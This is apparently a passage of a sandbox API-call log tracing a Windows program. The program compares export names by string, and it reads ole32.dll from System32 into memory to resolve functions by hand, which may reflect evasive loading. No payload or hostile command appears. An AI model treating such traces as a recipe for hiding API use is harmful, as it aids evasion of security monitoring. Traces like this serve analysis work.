(lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0094.064] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0094.065] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.065] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0094.066] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0094.067] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0094.067] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0094.068] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0094.068] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0094.068] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0094.502] GetProcessHeap () returned 0x430000 [0094.502] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d52010 | out: hHeap=0x430000) returned 1 [0094.512] GetProcessHeap () returned 0x430000 [0094.512] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4492a0 [0094.513] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0094.513] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0094.513] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0094.513] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0094.513] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0094.513] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0094.514] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0094.514] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0094.514] GetProcessHeap () returned 0x430000 [0094.514] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x142d00) returned 0x4116040 [0094.518] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0094.518] ReadFile (in: hFile=0x140, lpBuffer=0x4116040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4116040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0094.707] CloseHandle (hObject=0x140) returned 1 [0094.707] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0094.707] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0094.707] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0094.707] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0094.707] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0094.707] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0094.707] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0094.707] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0094.707] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0094.707] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="BindMoniker") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0094.708] lstrcmpA (lpString1="CLIPFORMAT_UserUnmarshalExt", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0094.708] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0094.708] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0094.708] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0094.708] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0094.708] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0094.708] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0094.708] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0094.709] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0094.709] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0094.709] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0094.709] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0094.709] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0094.709] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0094.709] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0094.709] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0094.709] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0094.709] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0094.710] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0094.710] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0094.711] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0094.711] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0094.711] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0094.711] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0094.711] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0094.711] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0094.711] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0094.711] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0094.711] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0094.711] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0094.711] lstrcmpA 